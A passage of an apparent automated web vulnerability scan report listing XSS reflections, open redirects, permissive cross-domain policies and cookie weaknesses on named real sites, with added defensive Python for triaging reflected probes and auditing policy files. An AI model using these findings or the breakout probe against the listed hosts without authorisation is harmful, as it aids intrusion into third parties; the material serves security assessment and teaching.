5.245. http://ar.voicefive.com/bmx3/broker.pli [ar_p90175839 cookie]

5.246. http://ar.voicefive.com/bmx3/broker.pli [ar_p91136705 cookie]

5.247. http://ar.voicefive.com/bmx3/broker.pli [ar_p91300630 cookie]

5.248. http://ar.voicefive.com/bmx3/broker.pli [ar_p92429851 cookie]

5.249. http://ar.voicefive.com/bmx3/broker.pli [ar_p97174789 cookie]

5.250. http://ar.voicefive.com/bmx3/broker.pli [ar_s_p81479006 cookie]

5.251. http://seg.sharethis.com/getSegment.php [__stid cookie]

5.252. http://west.thomson.com/Error/500Error.aspx [ASP.NET_SessionId cookie]

5.253. http://west.thomson.com/Signin.aspx [anonymous_userid_1 cookie]

5.254. http://west.thomson.com/productdetail/160547/12484463/productdetail.aspx [ASP.NET_SessionId cookie]

5.255. http://west.thomson.com/productdetail/160547/12484463/productdetail.aspx [ASP.NET_SessionId cookie]

5.256. http://west.thomson.com/store/DOTD.aspx [ASP.NET_SessionId cookie]

5.257. http://west.thomson.com/store/DOTD.aspx [anonymous_userid_1 cookie]

5.258. http://west.thomson.com/store/product.aspx [ASP.NET_SessionId cookie]

5.259. http://west.thomson.com/store/product.aspx [anonymous_userid_1 cookie]

5.260. http://west.thomson.com/store/secure/ShoppingBasket.aspx [ASP.NET_SessionId cookie]

5.261. http://west.thomson.com/store/secure/ShoppingBasket.aspx [anonymous_userid_1 cookie]

5.262. http://west.thomson.com/support/contact-us/default.aspx [ASP.NET_SessionId cookie]

5.263. http://west.thomson.com/support/contact-us/default.aspx [anonymous_userid_1 cookie]

5.264. https://west.thomson.com/store/Promotions/EmailPreferences/Login.aspx [ASP.NET_SessionId cookie]

5.265. https://west.thomson.com/store/secure/EmptyBasket.aspx [ASP.NET_SessionId cookie]

5.266. https://west.thomson.com/support/customer-service/order-info.aspx [ASP.NET_SessionId cookie]
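
A scanner records an entry in the list above whenever its probe string comes back in the response, so the first triage step is to decide in what form it came back. The classifier below is an added example, not part of the XSS.CX report: it wraps a marker in the characters that matter for breaking out of an HTML context and reports whether they survived, were entity-encoded, were percent-encoded, or were stripped. The marker `xq9k2` and the response fragments are constructed for the demonstration and were not captured from any host listed above.

```python
import html
import urllib.parse

# A Burp-style probe: a random alphanumeric marker (constructed here) wrapped
# in the characters whose survival decides whether the reflection is exploitable.
MARKER = "xq9k2"


def make_probe(marker=MARKER):
    return '"\'><' + marker + '>'


def classify_reflection(body, marker=MARKER):
    """Say how the probe built around `marker` came back in a response body.

    "raw"          the probe is reflected byte-for-byte: quotes and angle
                   brackets survived, so the value can break out of its
                   context (confirm in a browser; a non-HTML Content-Type
                   or a CSP may still stop execution)
    "html-encoded" < > " ' were entity-encoded: safe in HTML text and in a
                   quoted attribute
    "url-encoded"  reflected percent-encoded: safe unless decoded again later
    "marker-only"  the marker is there but the metacharacters were stripped
    "none"         not reflected at all
    """
    probe = make_probe(marker)
    if probe in body:
        return "raw"
    entity_forms = {
        html.escape(probe, quote=True),                             # &#x27; for '
        html.escape(probe, quote=True).replace("&#x27;", "&#39;"),  # decimal variant
    }
    if any(form in body for form in entity_forms):
        return "html-encoded"
    if urllib.parse.quote(probe, safe="") in body:
        return "url-encoded"
    if marker in body:
        return "marker-only"
    return "none"


def triage(responses, marker=MARKER):
    """Map each parameter name to the classification of its response body."""
    return {param: classify_reflection(body, marker) for param, body in responses.items()}


# Constructed response fragments, one per probed parameter.
SAMPLE_RESPONSES = {
    "from": '<input name="from" value="' + make_probe() + '">',
    "callback": 'typeof &quot;&#x27;&gt;&lt;xq9k2&gt; === "function"',
    "q": '<a href="/search?q=%22%27%3E%3Cxq9k2%3E">next page</a>',
    "sz": '<div class="ad xq9k2"></div>',
    "tab": '<html><body>no echo of the input at all</body></html>',
}


if __name__ == "__main__":
    for param, verdict in triage(SAMPLE_RESPONSES).items():
        print(f"{param:10s} {verdict}")
```

Only "raw" hits are worth a manual follow-up; "html-encoded" in a JavaScript string context (the `callback`, `cb` and `jscallback` parameters above) still needs a second probe with `\` and `;`, because entity encoding does nothing inside a `<script>` block.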

6. Flash cross-domain policy

6.1. http://ad.doubleclick.net/crossdomain.xml

6.2. http://amch.questionmarket.com/crossdomain.xml

6.3. http://ar.voicefive.com/crossdomain.xml

6.4. http://b.scorecardresearch.com/crossdomain.xml

6.5. http://b.voicefive.com/crossdomain.xml

6.6. http://bs.serving-sys.com/crossdomain.xml

6.7. http://c.atdmt.com/crossdomain.xml

6.8. http://c.msn.com/crossdomain.xml

6.9. http://col.stc.s-msn.com/crossdomain.xml

6.10. http://col.stj.s-msn.com/crossdomain.xml

6.11. http://colstc.msn.com/crossdomain.xml

6.12. http://colstj.msn.com/crossdomain.xml

6.13. http://img.widgets.video.s-msn.com/crossdomain.xml

6.14. http://now.eloqua.com/crossdomain.xml

6.15. http://omnituremarketing.tt.omtrdc.net/crossdomain.xml

6.16. http://rad.msn.com/crossdomain.xml

6.17. http://spe.atdmt.com/crossdomain.xml

6.18. http://ad.wsod.com/crossdomain.xml

6.19. http://api.bing.com/crossdomain.xml

6.20. http://investing.money.msn.com/crossdomain.xml

6.21. http://static.ak.connect.facebook.com/crossdomain.xml

6.22. http://www.actonsoftware.com/crossdomain.xml

6.23. http://www.msn.com/crossdomain.xml

6.24. http://citi.bridgetrack.com/crossdomain.xml

6.25. http://data.moneycentral.msn.com/crossdomain.xml

6.26. http://freemanco.app5.hubspot.com/crossdomain.xml

6.27. http://moneycentral.msn.com/crossdomain.xml

6.28. http://www.omniture.com/crossdomain.xml

7. Silverlight cross-domain policy

7.1. http://ad.doubleclick.net/clientaccesspolicy.xml

7.2. http://b.scorecardresearch.com/clientaccesspolicy.xml

7.3. http://b.voicefive.com/clientaccesspolicy.xml

7.4. http://c.atdmt.com/clientaccesspolicy.xml

7.5. http://c.msn.com/clientaccesspolicy.xml

7.6. http://img.widgets.video.s-msn.com/clientaccesspolicy.xml

7.7. http://rad.msn.com/clientaccesspolicy.xml

7.8. http://spe.atdmt.com/clientaccesspolicy.xml

7.9. http://api.bing.com/clientaccesspolicy.xml

7.10. http://data.moneycentral.msn.com/clientaccesspolicy.xml

7.11. http://money.msn.com/clientaccesspolicy.xml

7.12. http://moneycentral.msn.com/clientaccesspolicy.xml

7.13. http://services.money.msn.com/clientaccesspolicy.xml
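
Sections 6 and 7 list hosts that publish a Flash `crossdomain.xml` or a Silverlight `clientaccesspolicy.xml`; the scanner reports the file's existence, and it is the reviewer's job to read the policy and decide whether it is too broad. The auditor below is an added example, not code from the XSS.CX report or from any of the hosts listed: it parses both formats and flags wildcard origins, `secure="false"`, and wildcard request-header grants. The four policy documents are constructed for the demonstration.

```python
import xml.etree.ElementTree as ET

# Silverlight treats each of these as "any origin".
WILDCARD_URIS = {"*", "http://*", "https://*"}


def audit_crossdomain_xml(xml_text):
    """Findings for a Flash crossdomain.xml (<allow-access-from> policy)."""
    findings = []
    root = ET.fromstring(xml_text)
    for el in root.iter("allow-access-from"):
        domain = el.get("domain", "")
        if domain == "*":
            findings.append('allow-access-from domain="*": a SWF on any site can read '
                            "responses sent with the victim's cookies")
        elif domain.startswith("*."):
            findings.append(f"wildcard domain {domain}: every host under it is trusted")
        if el.get("secure", "true").lower() == "false":
            findings.append(f'secure="false" for {domain or "*"}: an http:// SWF may '
                            "read https:// responses")
    for el in root.iter("allow-http-request-headers-from"):
        if el.get("domain") == "*":
            findings.append('allow-http-request-headers-from domain="*": any origin '
                            "may send custom request headers")
    return findings


def audit_clientaccesspolicy_xml(xml_text):
    """Findings for a Silverlight clientaccesspolicy.xml (<policy> blocks)."""
    findings = []
    root = ET.fromstring(xml_text)
    for policy in root.iter("policy"):
        uris = [d.get("uri", "") for d in policy.iter("domain")]
        paths = [r.get("path", "") for r in policy.iter("resource")]
        if any(uri in WILDCARD_URIS for uri in uris):
            findings.append(f'domain uri="*" grants every origin access to {paths}')
        allow = policy.find("allow-from")
        if allow is not None and allow.get("http-request-headers") == "*":
            findings.append('http-request-headers="*": cross-origin callers may set '
                            "arbitrary request headers")
    return findings


# Constructed sample policies (not retrieved from the hosts above).
PERMISSIVE_CROSSDOMAIN = """<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
  <allow-access-from domain="*" secure="false"/>
  <allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>"""

SCOPED_CROSSDOMAIN = """<cross-domain-policy>
  <allow-access-from domain="www.example.com"/>
  <allow-access-from domain="*.example.com"/>
</cross-domain-policy>"""

PERMISSIVE_CLIENTACCESS = """<?xml version="1.0"?>
<access-policy>
  <cross-domain-access>
    <policy>
      <allow-from http-request-headers="*"><domain uri="*"/></allow-from>
      <grant-to><resource path="/" include-subpaths="true"/></grant-to>
    </policy>
  </cross-domain-access>
</access-policy>"""

SCOPED_CLIENTACCESS = """<access-policy>
  <cross-domain-access>
    <policy>
      <allow-from><domain uri="https://www.example.com"/></allow-from>
      <grant-to><resource path="/api/" include-subpaths="true"/></grant-to>
    </policy>
  </cross-domain-access>
</access-policy>"""


if __name__ == "__main__":
    for label, text, fn in (
        ("permissive crossdomain.xml", PERMISSIVE_CROSSDOMAIN, audit_crossdomain_xml),
        ("scoped crossdomain.xml", SCOPED_CROSSDOMAIN, audit_crossdomain_xml),
        ("permissive clientaccesspolicy.xml", PERMISSIVE_CLIENTACCESS, audit_clientaccesspolicy_xml),
        ("scoped clientaccesspolicy.xml", SCOPED_CLIENTACCESS, audit_clientaccesspolicy_xml),
    ):
        print(label, fn(text) or ["ok"])
```

A wildcard policy is only a vulnerability when the host also serves something worth stealing with ambient credentials: a pure ad or analytics endpoint with `domain="*"` is expected, while the same policy on a host that returns account data behind a session cookie is a cross-site read primitive for any Flash or Silverlight content on the web.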

8. Cleartext submission of password

8.1. http://support.moxiesoft.com/

8.2. http://www.aac.org/site/TR/Events/AWB08

8.3. http://www.bcbst.com/inc/loginform.asp

8.4. http://www.computerworlduk.com/news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/

8.5. http://www.freemanco.com/store/

8.6. http://www.widgetbox.com/account/login_lite.jsp

9. XML injection

9.1. http://freemanco.com/favicon.ico [REST URL parameter 1]

9.2. http://platform.twitter.com/anywhere.js [REST URL parameter 1]

9.3. http://services.money.msn.com/quoteservice/streaming [format parameter]

9.4. http://use.typekit.com/k/bpi7eqn-e.css [REST URL parameter 1]

9.5. http://use.typekit.com/k/bpi7eqn-e.css [REST URL parameter 2]

9.6. http://www.bertelsmann.com/bertelsmann_corp/wms41/xml/headerflash_config.xml.php [REST URL parameter 1]

9.7. http://www.bertelsmann.com/bertelsmann_corp/wms41/xml/headerflash_config.xml.php [REST URL parameter 2]

9.8. http://www.bertelsmann.com/bertelsmann_corp/wms41/xml/headerflash_config.xml.php [REST URL parameter 3]

9.9. http://www.bertelsmann.com/bertelsmann_corp/wms41/xml/headerflash_config.xml.php [REST URL parameter 4]

9.10. http://www.freemanco.com/freemanco [REST URL parameter 1]

9.11. http://www.freemanco.com/freemanco/ [REST URL parameter 1]

9.12. http://www.freemanco.com/freemanco/ourwork/creativeservices/creative.jsp [REST URL parameter 1]

9.13. http://www.freemanco.com/freemanco/ourwork/images/favicon.ico [REST URL parameter 1]

9.14. http://www.freemanco.com/store [REST URL parameter 1]

9.15. http://www.freemanco.com/store/ [REST URL parameter 1]

9.16. http://www.freemanco.com/store/freemanco/siteSearch/siteSearch.jsp [REST URL parameter 1]

10. SSL cookie without secure flag set

10.1. https://checkout.netsuite.com/s.nl

10.2. https://myaccount.west.thomson.com/MyAccount/AccessControl/AccessControl/SignIn

10.3. https://secure.bundle.com/Membership/LogOn

10.4. https://secure.bundle.com/services/nocache/Membership/UpdateAuthenticationStateToClient

10.5. https://www.bcbst.com/accounttools/public/askUserId.do

10.6. https://www.bcbst.com/inc/loginform.asp

10.7. https://www.bcbst.com/secure/public/login.asp

10.8. https://www.fusionvm.com/FusionVM/

10.9. https://west.thomson.com/GlobalBackgroundStyles.5.1.421.22.ashx

10.10. https://west.thomson.com/store/Promotions/EmailPreferences/Login.aspx

10.11. https://west.thomson.com/store/secure/EmptyBasket.aspx

10.12. https://west.thomson.com/store/secure/ShippingInfo.aspx

10.13. https://west.thomson.com/store/secure/ShippingLocation.aspx

10.14. https://west.thomson.com/support/customer-service/order-info.aspx

10.15. https://www.bcbst.com/accounttools/

11. Session token in URL

11.1. http://bh.contextweb.com/bh/set.aspx

11.2. http://i.widgetserver.com/ip/origin==http%3A%2F%2Fimg.widgetbox.com%2Fscreenshot%2F10%2F00b6be16-496c-476e-ba09-45115835efdf.png%3F22&&w==105&&h==158&&type==fill

11.3. http://i.widgetserver.com/ip/origin==http%3A%2F%2Fimg.widgetbox.com%2Fscreenshot%2F10%2F51dde360-e809-412c-ae67-1f21b2b26abd.png%3F273&&w==105&&h==158&&type==fill

11.4. http://i.widgetserver.com/ip/origin==http%3A%2F%2Fimg.widgetbox.com%2Fscreenshot%2F10%2F61f261a6-0395-4a73-ad28-aa6682f1cb2c.png%3F39&&w==105&&h==158&&type==fill

11.5. http://i.widgetserver.com/ip/origin==http%3A%2F%2Fimg.widgetbox.com%2Fscreenshot%2F10%2F98ecf5a3-3ea4-48fc-871b-1a4d63125e12.png%3F38&&w==105&&h==158&&type==fill

11.6. http://i.widgetserver.com/ip/origin==http%3A%2F%2Fimg.widgetbox.com%2Fscreenshot%2F10%2Faa71f5ac-e60e-44f1-8999-f5bf0858f0a6.png%3F24&&w==105&&h==158&&type==fill

11.7. http://i.widgetserver.com/ip/origin==http%3A%2F%2Fimg.widgetbox.com%2Fscreenshot%2F10%2Fcdac24b6-3da0-4096-999a-413159cf40e7.png%3F71&&w==105&&h==158&&type==fill

11.8. http://i.widgetserver.com/ip/origin==http%3A%2F%2Fimg.widgetbox.com%2Fscreenshot%2F10%2Fe7b3a682-8e5d-43db-a0bb-732298974c3f.png%3F35&&w==105&&h==158&&type==fill

11.9. http://i.widgetserver.com/ip/origin==http%3A%2F%2Fimg.widgetbox.com%2Fscreenshot%2F10%2Ffbfc48e1-fa2b-4d0f-a4d8-5950c30fd079.png%3F174&&w==105&&h==158&&type==fill

11.10. http://l.sharethis.com/log

11.11. http://l.sharethis.com/pview

11.12. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate

11.13. http://matrix.itasoftware.com/view/details

11.14. http://matrix.itasoftware.com/view/flights

11.15. http://matrix.itasoftware.com/xhr/shop/summarize

11.16. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/mbox/standard

11.17. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/sc/standard

11.18. http://p.widgetserver.com/p/fetch/origin==http%3A%2F%2Ftwitter.com%2Fstatuses%2Fuser_timeline%2Faidswalkboston.atom

11.19. http://p.widgetserver.com/p/fetch/origin==http%3A%2F%2Fwww.facebook.com%2Ffeeds%2Fpage.php%3Fformat%3Datom10%26id%3D95922227750

11.20. http://sales.liveperson.net/hc/18987408/

11.21. http://www.aac.org/site/TR/Events/AWB08

11.22. http://www.computerworld.com/s/article/9216003/Texas_fires_two_tech_chiefs_over_breach

11.23. http://www.facebook.com/extern/login_status.php

11.24. http://www.widgetserver.com/syndication/get_widget.html

11.25. http://www.widgetserver.com/syndication/html5/3651dbe5-aec4-42b2-8270-d62db9a25bfe

12. Open redirection

12.1. http://ad.trafficmp.com/a/bpix [r parameter]

12.2. http://west.thomson.com/Register/CreateTransferToken.aspx [ReturnUrl parameter]

13. Cookie scoped to parent domain

13.1. https://secure.bundle.com/services/nocache/Membership/UpdateAuthenticationStateToClient

13.2. http://www.computerworlduk.com/news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/

13.3. http://a.rad.msn.com/ADSAdClient31.dll

13.4. http://a.rad.msn.com/ADSAdClient31.dll

13.5. http://a.rfihub.com/ca.html

13.6. http://a.rfihub.com/cm

13.7. http://action.mathtag.com/mm//PHOE//lpg

13.8. http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/be/%2a/c%3B232789996%3B3-0%3B0%3B56669790%3B3454-728/90%3B38954353/38972110/2%3B%3B~sscs%3D%3fhttp://www.aptm.phoenix.edu/

13.9. http://ad.trafficmp.com/a/bpix

13.10. http://ad.trafficmp.com/a/bpix

13.11. http://ad.trafficmp.com/a/bpix

13.12. http://ad.trafficmp.com/a/bpix

13.13. http://ad.trafficmp.com/a/bpix

13.14. http://ad.trafficmp.com/a/bpix

13.15. http://ad.trafficmp.com/a/bpix

13.16. http://adx.adnxs.com/mapuid

13.17. http://altfarm.mediaplex.com/ad/js/15902-126860-34879-0

13.18. http://amch.questionmarket.com/adsc/d840009/7/41115363/decide.php

13.19. http://amch.questionmarket.com/adscgen/st.php

13.20. http://ar.voicefive.com/b/wc_beacon.pli

13.21. http://ar.voicefive.com/bmx3/broker.pli

13.22. http://ar.voicefive.com/bmx3/broker.pli

13.23. http://ar.voicefive.com/bmx3/broker.pli

13.24. http://b.scorecardresearch.com/b

13.25. http://b.scorecardresearch.com/r

13.26. http://b.voicefive.com/b

13.27. http://bh.contextweb.com/bh/set.aspx

13.28. http://bstats.adbrite.com/click/bstats.gif

13.29. http://c.atdmt.com/c.gif

13.30. http://c.homestore.com/srv/oreo

13.31. http://c.live.com/c.gif

13.32. http://c.msn.com/c.gif

13.33. http://c.realtor.com/srv/sugar

13.34. http://c7.zedo.com/img/bh.gif

13.35. http://cbglobal.112.2o7.net/b/ss/cbglobal/1/H.20.3/s62270389322657

13.36. http://code.randomhouse.com/b/ss/ranhcorporate,ranhrollup/1/H.17/s79731434181166

13.37. http://code.randomhouse.com/b/ss/ranhrollup/1/H.22.1/s74779692005831

13.38. http://d7.zedo.com/img/bh.gif

13.39. http://ds.addthis.com/red/psi/sites/www.bertelsmann.com/p.json

13.40. http://ecommerce.randomhouse.com/cart.do

13.41. http://ehg-gaddispartners.hitbox.com/HG

13.42. http://explore.live.com/Handlers/Plt.mvc

13.43. http://explore.live.com/windows-live-messenger

13.44. http://ib.adnxs.com/getuidu

13.45. http://ib.adnxs.com/pxj

13.46. http://ib.adnxs.com/seg

13.47. http://idcs.interclick.com/Segment.aspx

13.48. http://image2.pubmatic.com/AdServer/Pug

13.49. http://leadback.advertising.com/adcedge/lb

13.50. http://m.adnxs.com/msftcookiehandler

13.51. http://m.adnxs.com/tt

13.52. http://msn.careerbuilder.com/

13.53. http://omniture.112.2o7.net/b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s72142050643632

13.54. http://omniture.112.2o7.net/b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s72645798081596

13.55. http://omniture.112.2o7.net/b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s72918755419910

13.56. http://omniture.112.2o7.net/b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s75575511181236

13.57. http://omniture.112.2o7.net/b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s79267593701483

13.58. http://omniture.112.2o7.net/b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s7968447030146

13.59. http://omniture.112.2o7.net/b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s79784419631912

13.60. http://omniture.112.2o7.net/b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s79902329597084

13.61. http://p.opt.fimserve.com/bht/

13.62. http://pixel.fetchback.com/serve/fb/pdc

13.63. http://pixel.mathtag.com/event/js

13.64. http://pixel.quantserve.com/pixel

13.65. http://pixel.rubiconproject.com/tap.php

13.66. http://r.turn.com/r/beacon

13.67. http://realestate.msn.us.intellitxt.com/al.asp

13.68. http://realestate.msn.us.intellitxt.com/intellitxt/front.asp

13.69. http://rss.feedsportal.com/c/432/f/530802/s/146d96c3/l/0L0Scomputerworlduk0N0Cnews0Csecurity0C327630A50Coracle0Eresponds0Eto0Ehacker0Egroup0Eand0Epatches0Ejavacom0Evulnerability0C0Dolo0Frss/story01.htm

13.70. http://safebrowsing.clients.google.com/safebrowsing/downloads

13.71. http://segment-pixel.invitemedia.com/pixel

13.72. http://tags.bluekai.com/site/1654

13.73. http://tracker.marinsm.com/tp

13.74. http://usmoneytaxes.opt.video.msn.com/optimizevc.aspx

13.75. http://video.msn.com/soapboxservice2.aspx

13.76. http://www.actonsoftware.com/acton/bn/1091/visitor.gif

13.77. http://www.aptm.phoenix.edu/

13.78. http://www.aptm.phoenix.edu/AptiNet/HTTPHandlerServlet

13.79. http://www.aptm.phoenix.edu/AptiNet/hhs

13.80. http://www.bcbst.com/

13.81. http://www.bcbst.com/css/base.css

13.82. http://www.bcbst.com/css/footer.css

13.83. http://www.bcbst.com/css/global.css

13.84. http://www.bcbst.com/css/header.css

13.85. http://www.bcbst.com/css/lytebox.css

13.86. https://www.bcbst.com/accounttools/

13.87. http://www.bing.com/

13.88. http://www.bing.com/sck

13.89. http://www.bing.com/search

13.90. http://www.bing.com/search/

13.91. http://www.msn.com/

13.92. http://www.omniture.com/en/contact

13.93. http://www.omniture.com/en/products/conversion/testandtarget

13.94. http://www.omniture.com/en/products/marketing_integration/closed_loop_marketing

13.95. http://www.omniture.com/en/products/marketing_integration/genesis

13.96. http://www.omniture.com/en/products/marketing_integration/genesis/applications

13.97. http://www.omniture.com/en/products/marketing_integration/genesis/applications/15/444

13.98. http://www.omniture.com/en/products/marketing_integration/genesis/applications/15/574

13.99. http://www.omniture.com/en/products/marketing_integration/genesis/applications/39/543

13.100. http://www.omniture.com/en/products/multichannel_analytics/insight

13.101. http://www.omniture.com/en/products/multichannel_analytics/insight_retail

13.102. http://www.omniture.com/en/products/online_analytics/digitalpulse

13.103. http://www.omniture.com/en/products/online_analytics/discover

13.104. http://www.omniture.com/en/products/online_analytics/sitecatalyst

13.105. http://www.omniture.com/en/products/online_analytics/survey

13.106. http://www.omniture.com/en/products/open_business_analytics_platform/datawarehouse

13.107. http://www.omniture.com/offer/943

13.108. http://www.realtor.com/search/widgetportal/Widget.aspx

14. Cookie without HttpOnly flag set

14.1. https://checkout.netsuite.com/s.nl

14.2. http://data.cmcore.com/imp

14.3. http://ecommerce.randomhouse.com/cart.do

14.4. https://ecommerce.randomhouse.com/account.do

14.5. https://ecommerce.randomhouse.com/sign-in.do

14.6. http://kbportal.thomson.com/

14.7. http://kbportal.thomson.com/index.aspx

14.8. http://kbportal.thomson.com/utility/getResource.aspx

14.9. http://knowledgebase.net/

14.10. http://moxieinsight.com/

14.11. http://shopping.netsuite.com/s.nl

14.12. http://support.moxiesoft.com/

14.13. http://t2.trackalyzer.com/trackalyze.asp

14.14. http://www.aac.org/site/TR/Events/AWB08

14.15. http://www.bcbst.com/

14.16. https://www.bcbst.com/accounttools/public/askUserId.do

14.17. https://www.bcbst.com/inc/loginform.asp

14.18. https://www.bcbst.com/secure/public/login.asp

14.19. http://www.cargill.com/

14.20. http://www.computerworlduk.com/news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/

14.21. http://www.freemanco.com/freemanco/

14.22. http://www.freemanco.com/store/scripts/jquery.form.js

14.23. http://www.freemanco.com/store/scripts/jquery1.3.2.js

14.24. http://www.freemanco.com/store/styles/ui.datepicker.css

14.25. http://www.fusionvm.com/

14.26. http://www.magellangps.com/

14.27. http://www.moxieinsight.com/

14.28. http://www.visitortracklog.com/loghit.asp

14.29. http://www.visitortracklog.com/loghit.asp

14.30. http://www.widgetbox.com/

14.31. http://a.rfihub.com/ca.html

14.32. http://a.rfihub.com/cm

14.33. http://action.mathtag.com/mm//PHOE//lpg

14.34. http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/be/%2a/c%3B232789996%3B3-0%3B0%3B56669790%3B3454-728/90%3B38954353/38972110/2%3B%3B~sscs%3D%3fhttp://www.aptm.phoenix.edu/

14.35. http://ad.trafficmp.com/a/bpix

14.36. http://ad.trafficmp.com/a/bpix

14.37. http://ad.trafficmp.com/a/bpix

14.38. http://ad.trafficmp.com/a/bpix

14.39. http://ad.trafficmp.com/a/bpix

14.40. http://ad.trafficmp.com/a/bpix

14.41. http://ad.trafficmp.com/a/bpix

14.42. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1359.827.tk.100x25/185076156

14.43. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1391.835.tk.TEXT/422725724

14.44. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959**

14.45. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959**

14.46. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218**

14.47. http://ad.yieldmanager.com/pixel

14.48. http://advertising.microsoft.com/home

14.49. http://altfarm.mediaplex.com/ad/js/15902-126860-34879-0

14.50. http://amch.questionmarket.com/adsc/d840009/7/41115363/decide.php

14.51. http://amch.questionmarket.com/adscgen/st.php

14.52. http://ar.voicefive.com/b/wc_beacon.pli

14.53. http://ar.voicefive.com/bmx3/broker.pli

14.54. http://ar.voicefive.com/bmx3/broker.pli

14.55. http://ar.voicefive.com/bmx3/broker.pli

14.56. http://b.scorecardresearch.com/b

14.57. http://b.scorecardresearch.com/r

14.58. http://b.voicefive.com/b

14.59. http://bh.contextweb.com/bh/set.aspx

14.60. http://blog.widgetbox.com/

14.61. http://bstats.adbrite.com/click/bstats.gif

14.62. http://c.atdmt.com/c.gif

14.63. http://c.homestore.com/srv/oreo

14.64. http://c.live.com/c.gif

14.65. http://c.msn.com/c.gif

14.66. http://c.realtor.com/srv/sugar

14.67. http://c7.zedo.com/img/bh.gif

14.68. http://cbglobal.112.2o7.net/b/ss/cbglobal/1/H.20.3/s62270389322657

14.69. http://citi.bridgetrack.com/event/

14.70. http://code.randomhouse.com/b/ss/ranhcorporate,ranhrollup/1/H.17/s79731434181166

14.71. http://code.randomhouse.com/b/ss/ranhrollup/1/H.22.1/s74779692005831

14.72. http://d7.zedo.com/img/bh.gif

14.73. http://data.cmcore.com/imp

14.74. http://ds.addthis.com/red/psi/sites/www.bertelsmann.com/p.json

14.75. http://ecommerce.randomhouse.com/cart.do

14.76. http://ehg-gaddispartners.hitbox.com/HG

14.77. http://explore.live.com/Handlers/Plt.mvc

14.78. http://explore.live.com/windows-live-messenger

14.79. http://freemanco.app5.hubspot.com/salog.js.aspx

14.80. http://g.adspeed.net/ad.php

14.81. http://homestore.122.2o7.net/b/ss/movesyndication/1/H.2-pdv-2/s62061750586144

14.82. http://i.kissmetrics.com/i.js

14.83. http://idcs.interclick.com/Segment.aspx

14.84. http://image2.pubmatic.com/AdServer/Pug

14.85. http://kbportal.thomson.com/display/2/index.aspx

14.86. http://kbportal.thomson.com/display/2/kb/cat.aspx

14.87. http://kbportal.thomson.com/display/2/login.aspx

14.88. http://kbportal.thomson.com/favicon.ico

14.89. http://kbportal.thomson.com/images/clearpixel.gif

14.90. http://kbportal.thomson.com/images/poweredbydark.png

14.91. http://kbportal.thomson.com/index.aspx

14.92. http://kbportal.thomson.com/js/default.js

14.93. http://leadback.advertising.com/adcedge/lb

14.94. http://msnportal.112.2o7.net/b/ss/msnportalusenmoney/1/H.7-pdv-2/1303842955283

14.95. http://o.computerworlduk.com/b/ss/idgcomputerworld/1/H.19.4/s72592209363356

14.96. http://omniture.112.2o7.net/b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s72142050643632

14.97. http://omniture.112.2o7.net/b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s72645798081596

14.98. http://omniture.112.2o7.net/b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s72918755419910

14.99. http://omniture.112.2o7.net/b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s75575511181236

14.100. http://omniture.112.2o7.net/b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s79267593701483

14.101. http://omniture.112.2o7.net/b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s7968447030146

14.102. http://omniture.112.2o7.net/b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s79784419631912

14.103. http://omniture.112.2o7.net/b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s79902329597084

14.104. http://p.opt.fimserve.com/bht/

14.105. http://pixel.fetchback.com/serve/fb/pdc

14.106. http://pixel.mathtag.com/event/js

14.107. http://pixel.quantserve.com/pixel

14.108. http://pixel.rubiconproject.com/tap.php

14.109. http://r.turn.com/r/beacon

14.110. http://realestate.msn.us.intellitxt.com/al.asp

14.111. http://realestate.msn.us.intellitxt.com/intellitxt/front.asp

14.112. http://recs.richrelevance.com/rrserver/p13n_generated.js

14.113. http://recs.richrelevance.com/rrserver/p13n_generated.js

14.114. http://reviews.west.thomson.com/logging

14.115. http://rss.feedsportal.com/c/432/f/530802/s/146d96c3/l/0L0Scomputerworlduk0N0Cnews0Csecurity0C327630A50Coracle0Eresponds0Eto0Ehacker0Egroup0Eand0Epatches0Ejavacom0Evulnerability0C0Dolo0Frss/story01.htm

14.116. http://safebrowsing.clients.google.com/safebrowsing/downloads

14.117. http://sales.liveperson.net/hc/18987408/

14.118. http://scripts.omniture.com/global/scripts/targeting/dyn_prop.php

14.119. http://sdc.bcbst.com/dcs962n2r10000w49zv2i4z3u_3s7u/dcs.gif

